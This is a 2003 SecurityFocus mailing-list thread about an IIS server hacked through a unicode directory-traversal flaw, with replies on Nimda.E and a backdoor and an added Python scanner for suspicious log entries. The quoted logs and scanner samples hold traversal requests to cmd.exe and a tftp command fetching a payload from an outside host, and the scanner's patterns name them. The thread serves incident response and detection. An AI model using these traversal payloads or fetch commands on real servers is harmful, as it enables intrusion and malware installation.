Incidents
Hacked web server Jan 10 2003 08:39PM
Rogelio Vidaurri Courcelle (rvidaurri haciendachiapas gob mx) (3 replies)
Re: Hacked web server Jan 17 2003 06:53PM
Ryan Yagatich (ryany pantek com) (1 replies)
RE: Hacked web server Jan 21 2003 01:52AM
Jason Coombs (jasonc science org) (1 replies)
RE: Hacked web server Jan 24 2003 05:24PM
Ryan Yagatich (ryany pantek com)
Re: Hacked web server Jan 13 2003 02:20AM
Michael Katz (mike procinct com) (2 replies)
Re: Hacked web server Jan 14 2003 01:28PM
sunzi (sunzi mod-x co uk)
Rogelio,

on Nimda.E from Symantec:
This worm is similar in functionality to W32.Nimda.A@mm. Differences include
the modification of file names used by the worm.
The attachment received has been changed to: Sample.exe
The dropped .dll file is now: Httpodbc.dll
The worm now copies itself to the %Windows% folder as Csrss.exe instead
of Mmc.exe

Try looking for c:\winnt\csrss.exe for the virus.

Also, this isn't where the ncx99.exe came from. I'd do a thorough search for
any usage of cmd.exe/root.exe in your web logs and start there, after taking
it offline.

hth,
sunzi
----- Original Message -----
From: "Michael Katz" <mike (at) procinct (dot) com>
To: <incidents (at) securityfocus (dot) com>
Cc: "Rogelio Vidaurri Courcelle" <rvidaurri (at) haciendachiapas.gob (dot) mx>
Sent: Sunday, January 12, 2003 9:20 PM
Subject: Re: Hacked web server

> At 1/10/2003 12:39 PM, Rogelio Vidaurri Courcelle wrote:
>
> >Hi... my web server (NT 4.0 SP6a) was hacked last friday
>
> Rogelio,
>
> >200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+dir,
>
> The above shows that your server is susceptible to a vulnerability detailed
> in Microsoft Security Bulletin MS00-057
> (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp). This
> vulnerability is NOT fixed by Service Pack 6a. You need to install
> additional patches for IIS. When you rebuild the server, you should
> install the cumulative IIS patch described in Microsoft Security Bulletin
> MS02-062 (http://www.microsoft.com/technet/security/bulletin/ms02-062.asp)
>
> >200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
> >200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
> >200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
>
> Your failure to find a virus (httpodbc.dll) on your hard disk may indicate
> that your firewall was configured properly or that antivirus software
> prevented the infected file from being written to your hard disk (if you
> had antivirus software with relatively current definitions). However,
> there are plenty of other bad things that could be on your system that
> attackers could have placed on your system that would not be flagged as
> malware by antivirus software.
>
> >i have read that it could be because of Nimda but i have scanned with
> >the latest pattern and it found no viruses... only a backdoor trojan
> >called ncx99.exe dropped in mailroot\drop\temp
> >by the way, can i delete files inside that folder??? there's a
> >rundlls32.exe... a KEY file, etcetera......
>
> ncx99.exe is most likely a modified version of netcat and is not flagged by
> most antivirus software as malware.
>
> If your machine has been configured this way for two months, you should
> rebuild it and start from scratch. Who knows what attackers may have done
> to your system?
>
>
> Michael Katz
> mike (at) procinct (dot) com
> Procinct Security
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>

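The advice in this thread is to pull the server offline and go through the web logs for every request that reached cmd.exe or root.exe. The following log scanner is an added example written for this page; it is not code from the thread or from SecurityFocus. It takes the two log lines Rogelio posted plus a few constructed lines (one benign request, one failed root.exe attempt, one double-encoded traversal) and flags traversal sequences, requests for the two binaries, and `/c+` command strings. The column order (client IP, user, date, time, service, server name, server IP, time taken, bytes received, bytes sent, HTTP status, Win32 status, method, URI stem, URI query) is assumed from the Microsoft IIS log format as it appears in the posted lines; the `SUSPECT_BINARIES` set and the repeated-decode depth are the example's own choices.

```python
from urllib.parse import unquote

# Binaries the thread recommends searching for in the web logs.
SUSPECT_BINARIES = {"cmd.exe", "root.exe"}

# Sample log: the first two lines are the ones quoted in the thread, the rest
# are constructed for this example (a normal hit, a failed root.exe probe with
# status 404, and a double-encoded "..%255c.." traversal).
SAMPLE_LOG = "\n".join([
    r"200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,",
    r"200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,",
    r"10.0.0.5, -, 5/01/03, 4:16:00, W3SVC, INGRESOS02, 200.38.152.221, 15, 200, 1200, 200, 0, GET, /index.htm, -,",
    r"10.0.0.6, -, 5/01/03, 4:17:00, W3SVC, INGRESOS02, 200.38.152.221, 20, 210, 0, 404, 3, GET, /scripts/root.exe, /c+dir,",
    r"10.0.0.7, -, 5/01/03, 4:18:00, W3SVC, INGRESOS02, 200.38.152.221, 20, 210, 0, 200, 0, GET, /scripts/..%255c../winnt/system32/cmd.exe, /c+dir,",
])


def decode_path(raw, rounds=3):
    """URL-decode repeatedly so double encoding (%255c -> %5c -> \\) does not
    hide a traversal, then normalise backslashes to '/' and lower-case."""
    decoded = raw
    for _ in range(rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/").lower()


def parse_iis_line(line):
    """Split one Microsoft-IIS-format log line (assumed column order, see
    lead-in) into the fields the scanner needs; None if the line is short."""
    parts = [p.strip() for p in line.rstrip("\n").split(",")]
    if len(parts) < 15:
        return None
    return {
        "client_ip": parts[0], "date": parts[2], "time": parts[3],
        "status": parts[10], "method": parts[12],
        "uri_stem": parts[13], "uri_query": parts[14],
    }


def classify(entry):
    """Return the reasons a request looks like traversal / command execution
    (empty list for an ordinary request)."""
    reasons = []
    path = decode_path(entry["uri_stem"])
    query = decode_path(entry["uri_query"])
    if "../" in path:
        reasons.append("directory traversal")
    basename = path.rsplit("/", 1)[-1]
    if basename in SUSPECT_BINARIES:
        reasons.append("request for " + basename)
    if query.startswith("/c+") or query.startswith("/c "):
        reasons.append("command passed via /c")
    if "tftp" in query:
        reasons.append("tftp transfer in query (file drop)")
    return reasons


def scan_log(text):
    """Scan a whole log; each finding carries the parsed fields, the reasons,
    and whether IIS answered 200 (i.e. the command most likely ran)."""
    findings = []
    for line in text.splitlines():
        entry = parse_iis_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({**entry, "reasons": reasons,
                             "executed": entry["status"] == "200"})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        state = "EXECUTED" if f["executed"] else "failed"
        print(f"{f['date']} {f['time']} {f['client_ip']} {state}: "
              f"{f['uri_stem']} {f['uri_query']} [{', '.join(f['reasons'])}]")
```

The `executed` flag uses the HTTP status exactly as Michael's reading of the posted lines does: a 200 on a cmd.exe request means IIS ran the command and returned its output, while a 404 or 500 means the attempt fell through. Treat it as a triage hint only; the `tftp` reason is the one that tells you which hits to check for dropped files (httpodbc.dll on each drive in the posted lines), and any 200 in the list is a reason to rebuild rather than clean.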

RE: Hacked web server Jan 13 2003 03:28PM
Michael LaSalvia (mike jason org)
Re: Hacked web server Jan 12 2003 11:43PM
Tibor Biro (tiborbiro rogers com)
Copyright 2009, SecurityFocus